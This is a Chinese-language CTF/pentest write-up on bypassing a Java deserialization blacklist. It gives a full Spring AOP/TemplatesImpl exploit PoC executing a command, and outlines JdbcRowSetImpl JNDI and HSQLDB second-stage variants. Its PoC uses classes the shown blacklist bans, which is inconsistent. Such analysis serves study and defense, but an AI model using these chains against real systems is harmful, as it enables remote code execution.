JustDeserialize 绕过黑名单挖掘利用链技术分析<\/h1>

前言<\/h2>
本文详细分析了一种绕过Java反序列化黑名单限制的技术，通过Spring AOP原生链和JdbcRowSetImpl攻击实现RCE。该技术适用于存在自定义反序列化黑名单的场景，特别是在CTF比赛和实际渗透测试中遇到类似限制时非常有用。<\/p>

源码分析<\/h2>

目标系统分析<\/h3>

目标系统是一个Java Web应用，主要包含以下关键组件：<\/p>

路由代码<\/strong> (backdoor<\/code>类)：<\/li> <\/ol> @RestController<\/span> <\/span><\/span>public<\/span> class<\/span> backdoor<\/span> {<\/span> <\/span><\/span> static<\/span> String banner =<\/span> "Welcome to java"<\/span>;<\/span> <\/span><\/span> <\/span><\/span> @RequestMapping<\/span>({<\/span>"\/read"<\/span>})<\/span> <\/span><\/span> public<\/span> String read<\/span>(<\/span>@RequestBody<\/span> String body)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>body !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> byte<\/span>[]<\/span> data =<\/span> Base64.<\/span>getDecoder<\/span>().<\/span>decode<\/span>(<\/span>body);<\/span> <\/span><\/span> String temp =<\/span> new<\/span> String(<\/span>data);<\/span> <\/span><\/span> \/\/ 第一层防护：字符串内容检查 <\/span><\/span><\/span><\/span> if<\/span> (<\/span>temp.<\/span>contains<\/span>(<\/span>"naming"<\/span>)<\/span> ||<\/span> temp.<\/span>contains<\/span>(<\/span>"com.sun"<\/span>)<\/span> ||<\/span> temp.<\/span>contains<\/span>(<\/span>"jdk.jfr"<\/span>))<\/span> {<\/span> <\/span><\/span> return<\/span> "banned"<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> ByteArrayInputStream byteArrayInputStream =<\/span> new<\/span> ByteArrayInputStream(<\/span>data);<\/span> <\/span><\/span> MyObjectInputStream objectInputStream =<\/span> new<\/span> MyObjectInputStream(<\/span>byteArrayInputStream);<\/span> <\/span><\/span> Object object =<\/span> objectInputStream.<\/span>readObject<\/span>();<\/span> <\/span><\/span> return<\/span> object.<\/span>getClass<\/span>().<\/span>toString<\/span>();<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> return<\/span> e.<\/span>toString<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> "ok"<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre> 自定义反序列化类<\/strong> (MyObjectInputStream<\/code>)：<\/li> <\/ol> public<\/span> class<\/span> MyObjectInputStream<\/span> extends<\/span> ObjectInputStream {<\/span> <\/span><\/span> private<\/span> String[]<\/span> denyClasses;<\/span> <\/span><\/span> <\/span><\/span> public<\/span> MyObjectInputStream<\/span>(<\/span>ByteArrayInputStream var1)<\/span> throws<\/span> IOException {<\/span> <\/span><\/span> super<\/span>(<\/span>var1);<\/span> <\/span><\/span> ArrayList<<\/span>String><\/span> classList =<\/span> new<\/span> ArrayList<>();<\/span> <\/span><\/span> \/\/ 从blacklist.txt加载黑名单 <\/span><\/span><\/span><\/span> InputStream file =<\/span> MyObjectInputStream.<\/span>class<\/span>.<\/span>getResourceAsStream<\/span>(<\/span>"\/blacklist.txt"<\/span>);<\/span> <\/span><\/span> BufferedReader var2 =<\/span> new<\/span> BufferedReader(<\/span>new<\/span> InputStreamReader(<\/span>file));<\/span> <\/span><\/span> while<\/span> (<\/span>true<\/span>)<\/span> {<\/span> <\/span><\/span> String var4 =<\/span> var2.<\/span>readLine<\/span>();<\/span> <\/span><\/span> if<\/span> (<\/span>var4 !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> classList.<\/span>add<\/span>(<\/span>var4.<\/span>trim<\/span>());<\/span> <\/span><\/span> }<\/span> else<\/span> {<\/span> <\/span><\/span> this<\/span>.<\/span>denyClasses<\/span> =<\/span> new<\/span> String[<\/span>classList.<\/span>size<\/span>()];<\/span> <\/span><\/span> classList.<\/span>toArray<\/span>(<\/span>this<\/span>.<\/span>denyClasses<\/span>);<\/span> <\/span><\/span> return<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> protected<\/span> Class<?><\/span> resolveClass(<\/span>ObjectStreamClass desc)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span> <\/span><\/span> String className =<\/span> desc.<\/span>getName<\/span>();<\/span> <\/span><\/span> \/\/ 第二层防护：类名黑名单检查 <\/span><\/span><\/span><\/span> for<\/span> (<\/span>String denyClass :<\/span> this<\/span>.<\/span>denyClasses<\/span>)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>className.<\/span>startsWith<\/span>(<\/span>denyClass))<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> InvalidClassException(<\/span>"Unauthorized deserialization attempt"<\/span>,<\/span> className);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> super<\/span>.<\/span>resolveClass<\/span>(<\/span>desc);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>黑名单内容<\/h3> 黑名单文件blacklist.txt<\/code>包含以下被禁止的类：<\/p> javax.management.BadAttributeValueExpException com.sun.org.apache.xpath.internal.objects.XString java.rmi.MarshalledObject java.rmi.activation.ActivationID javax.swing.event.EventListenerList java.rmi.server.RemoteObject javax.swing.AbstractAction javax.swing.text.DefaultFormatter java.beans.EventHandler java.net.Inet4Address java.net.Inet6Address java.net.InetAddress java.net.InetSocketAddress java.net.Socket java.net.URL java.net.URLStreamHandler com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl java.rmi.registry.Registry java.rmi.RemoteObjectInvocationHandler java.rmi.server.ObjID java.lang.System javax.management.remote.JMXServiceUR javax.management.remote.rmi.RMIConnector java.rmi.server.RemoteObject java.rmi.server.RemoteRef javax.swing.UIDefaults$TextAndMnemonicHashMap java.rmi.server.UnicastRemoteObject java.util.Base64 java.util.Comparator java.util.HashMap java.util.logging.FileHandler java.security.SignedObject javax.swing.UIDefaults <\/code><\/pre> Spring AOP原生链利用<\/h2> 利用原理<\/h3> Spring AOP原生链利用了Spring框架的动态代理机制，通过构造特定的代理对象，可以在反序列化过程中触发任意方法调用。该链不依赖常见的黑名单类，因此可以绕过大多数反序列化防护。<\/p> 完整POC<\/h3> import<\/span> com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;<\/span> <\/span><\/span>import<\/span> javassist.ClassPool;<\/span> <\/span><\/span>import<\/span> javassist.CtClass;<\/span> <\/span><\/span>import<\/span> javassist.CtConstructor;<\/span> <\/span><\/span>import<\/span> org.aopalliance.aop.Advice;<\/span> <\/span><\/span>import<\/span> org.aopalliance.intercept.MethodInterceptor;<\/span> <\/span><\/span>import<\/span> org.springframework.aop.aspectj.AbstractAspectJAdvice;<\/span> <\/span><\/span>import<\/span> org.springframework.aop.aspectj.AspectJAroundAdvice;<\/span> <\/span><\/span>import<\/span> org.springframework.aop.aspectj.AspectJExpressionPointcut;<\/span> <\/span><\/span>import<\/span> org.springframework.aop.aspectj.SingletonAspectInstanceFactory;<\/span> <\/span><\/span>import<\/span> org.springframework.aop.framework.AdvisedSupport;<\/span> <\/span><\/span>import<\/span> org.springframework.aop.support.DefaultIntroductionAdvisor;<\/span> <\/span><\/span>import<\/span> org.springframework.core.Ordered;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.*;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Proxy;<\/span> <\/span><\/span>import<\/span> java.util.PriorityQueue;<\/span> <\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<\/span> <\/span><\/span>import<\/span> javax.management.BadAttributeValueExpException;<\/span> <\/span><\/span>import<\/span> javax.xml.transform.Templates;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> main<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 1. 创建恶意字节码 <\/span><\/span><\/span><\/span> ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span> <\/span><\/span> CtClass clazz =<\/span> pool.<\/span>makeClass<\/span>(<\/span>"a"<\/span>);<\/span> <\/span><\/span> CtClass superClass =<\/span> pool.<\/span>get<\/span>(<\/span>AbstractTranslet.<\/span>class<\/span>.<\/span>getName<\/span>());<\/span> <\/span><\/span> clazz.<\/span>setSuperclass<\/span>(<\/span>superClass);<\/span> <\/span><\/span> CtConstructor constructor =<\/span> new<\/span> CtConstructor(<\/span>new<\/span> CtClass[]{},<\/span> clazz);<\/span> <\/span><\/span> constructor.<\/span>setBody<\/span>(<\/span>"Runtime.getRuntime().exec(\"calc\");"<\/span>);<\/span> <\/span><\/span> clazz.<\/span>addConstructor<\/span>(<\/span>constructor);<\/span> <\/span><\/span> byte<\/span>[][]<\/span> bytes =<\/span> new<\/span> byte<\/span>[][]{<\/span>clazz.<\/span>toBytecode<\/span>()};<\/span> <\/span><\/span> <\/span><\/span> \/\/ 2. 设置TemplatesImpl <\/span><\/span><\/span><\/span> TemplatesImpl templates =<\/span> TemplatesImpl.<\/span>class<\/span>.<\/span>newInstance<\/span>();<\/span> <\/span><\/span> Reflections.<\/span>setFieldValue<\/span>(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> bytes);<\/span> <\/span><\/span> Reflections.<\/span>setFieldValue<\/span>(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "GSBP"<\/span>);<\/span> <\/span><\/span> Reflections.<\/span>setFieldValue<\/span>(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> null<\/span>);<\/span> <\/span><\/span> Method method =<\/span> templates.<\/span>getClass<\/span>().<\/span>getMethod<\/span>(<\/span>"newTransformer"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 3. 构造Spring AOP链 <\/span><\/span><\/span><\/span> SingletonAspectInstanceFactory factory =<\/span> new<\/span> SingletonAspectInstanceFactory(<\/span>templates);<\/span> <\/span><\/span> AspectJAroundAdvice advice =<\/span> new<\/span> AspectJAroundAdvice(<\/span> <\/span><\/span> method,<\/span> <\/span><\/span> new<\/span> AspectJExpressionPointcut(),<\/span> <\/span><\/span> factory <\/span><\/span> );<\/span> <\/span><\/span> <\/span><\/span> \/\/ 4. 创建代理对象 <\/span><\/span><\/span><\/span> Proxy proxy1 =<\/span> (<\/span>Proxy)<\/span> getAProxy(<\/span>advice,<\/span> Advice.<\/span>class<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 5. 触发反序列化 <\/span><\/span><\/span><\/span> BadAttributeValueExpException badAttributeValueExpException =<\/span> new<\/span> BadAttributeValueExpException(<\/span>123<\/span>);<\/span> <\/span><\/span> Reflections.<\/span>setFieldValue<\/span>(<\/span>badAttributeValueExpException,<\/span> "val"<\/span>,<\/span> proxy1);<\/span> <\/span><\/span> Util.<\/span>deserialize<\/span>(<\/span>Util.<\/span>serialize<\/span>(<\/span>badAttributeValueExpException));<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> \/\/ 创建B类型代理 <\/span><\/span><\/span><\/span> public<\/span> static<\/span> Object getBProxy<\/span>(<\/span>Object obj,<\/span> Class[]<\/span> clazzs)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> AdvisedSupport advisedSupport =<\/span> new<\/span> AdvisedSupport();<\/span> <\/span><\/span> advisedSupport.<\/span>setTarget<\/span>(<\/span>obj);<\/span> <\/span><\/span> Constructor constructor =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.aop.framework.JdkDynamicAopProxy"<\/span>)<\/span> <\/span><\/span> .<\/span>getConstructor<\/span>(<\/span>AdvisedSupport.<\/span>class<\/span>);<\/span> <\/span><\/span> constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> InvocationHandler handler =<\/span> (<\/span>InvocationHandler)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>advisedSupport);<\/span> <\/span><\/span> return<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span> clazzs,<\/span> handler);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> \/\/ 创建A类型代理 <\/span><\/span><\/span><\/span> public<\/span> static<\/span> Object getAProxy<\/span>(<\/span>Object obj,<\/span> Class<?><\/span> clazz)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> AdvisedSupport advisedSupport =<\/span> new<\/span> AdvisedSupport();<\/span> <\/span><\/span> AbstractAspectJAdvice advice =<\/span> (<\/span>AbstractAspectJAdvice)<\/span> obj;<\/span> <\/span><\/span> DefaultIntroductionAdvisor advisor =<\/span> new<\/span> DefaultIntroductionAdvisor(<\/span> <\/span><\/span> (<\/span>Advice)<\/span> getBProxy(<\/span>advice,<\/span> new<\/span> Class[]{<\/span>MethodInterceptor.<\/span>class<\/span>})<\/span> <\/span><\/span> );<\/span> <\/span><\/span> advisedSupport.<\/span>addAdvisor<\/span>(<\/span>advisor);<\/span> <\/span><\/span> Constructor constructor =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.aop.framework.JdkDynamicAopProxy"<\/span>)<\/span> <\/span><\/span> .<\/span>getConstructor<\/span>(<\/span>AdvisedSupport.<\/span>class<\/span>);<\/span> <\/span><\/span> constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> InvocationHandler handler =<\/span> (<\/span>InvocationHandler)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>advisedSupport);<\/span> <\/span><\/span> return<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span> new<\/span> Class[]{<\/span>clazz},<\/span> handler);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>调用链分析<\/h3> 反序列化入口<\/strong>：BadAttributeValueExpException.readObject()<\/code><\/li> 触发代理调用<\/strong>：当访问val<\/code>属性时会触发代理的invoke<\/code>方法<\/li> Spring AOP处理<\/strong>： JdkDynamicAopProxy.invoke()<\/code><\/li> ReflectiveMethodInvocation.proceed()<\/code><\/li> invokeAdviceMethodWithGivenArgs()<\/code> - 关键sink点<\/li> <\/ul> <\/li> 执行恶意代码<\/strong>：最终调用TemplatesImpl.newTransformer()<\/code>执行字节码<\/li> <\/ol> JdbcRowSetImpl攻击<\/h2> 当BadAttributeValueExpException<\/code>被黑名单禁止时，可以使用PriorityQueue<\/code>触发compare<\/code>方法，结合JNDI注入实现攻击。<\/p> 修改后的POC关键部分<\/h3> \/\/ 使用PriorityQueue代替BadAttributeValueExpException <\/span><\/span><\/span><\/span>PriorityQueue<<\/span>Object><\/span> queue =<\/span> new<\/span> PriorityQueue<>(<\/span>2<\/span>,<\/span> (<\/span>Comparator)<\/span> proxy1);<\/span> <\/span><\/span>queue.<\/span>add<\/span>(<\/span>1<\/span>);<\/span> <\/span><\/span>queue.<\/span>add<\/span>(<\/span>1<\/span>);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 序列化并触发 <\/span><\/span><\/span><\/span>byte<\/span>[]<\/span> serialized =<\/span> Serializer.<\/span>serialize<\/span>(<\/span>queue);<\/span> <\/span><\/span>Deserializer.<\/span>deserialize<\/span>(<\/span>serialized);<\/span> <\/span><\/span><\/code><\/pre>JNDI攻击流程<\/h3> 构造恶意的JdbcRowSetImpl对象<\/li> 设置dataSourceName指向恶意LDAP\/RMI服务器<\/li> 当触发compare<\/code>方法时，会尝试连接设置的JNDI地址<\/li> 恶意服务器返回Reference对象，触发远程类加载<\/li> <\/ol> HSQLDB二次反序列化<\/h2> 当目标环境包含HSQLDB依赖时，可以利用其JDBC驱动实现二次反序列化：<\/p> 第一次反序列化<\/strong>：通过允许的类触发JDBC连接<\/li> HSQLDB处理<\/strong>：恶意JDBC URL指向包含序列化对象的资源<\/li> 二次反序列化<\/strong>：HSQLDB在初始化时会反序列化这些对象，此时不再受黑名单限制<\/li> <\/ol> 组合攻击优势<\/h3> 第一次反序列化只需触发JDBC连接，可以使用简单类<\/li> 第二次反序列化发生在HSQLDB内部，完全绕过应用层防护<\/li> 可以结合Jackson等原生链实现更复杂的攻击<\/li> <\/ol> 防御建议<\/h2> 使用白名单而非黑名单机制<\/li> 升级Spring框架到最新版本<\/li> 限制JNDI查找功能<\/li> 监控异常的JDBC连接行为<\/li> 使用SecurityManager限制敏感操作<\/li> <\/ol> 总结<\/h2> 本文详细分析了绕过Java反序列化黑名单的多种技术，重点介绍了Spring AOP原生链的利用原理和实现方式。通过组合使用这些技术，攻击者可以在严格的黑名单限制下实现RCE。防御方面需要采取多层次的安全措施，单纯依赖黑名单无法提供足够的安全保障。<\/p>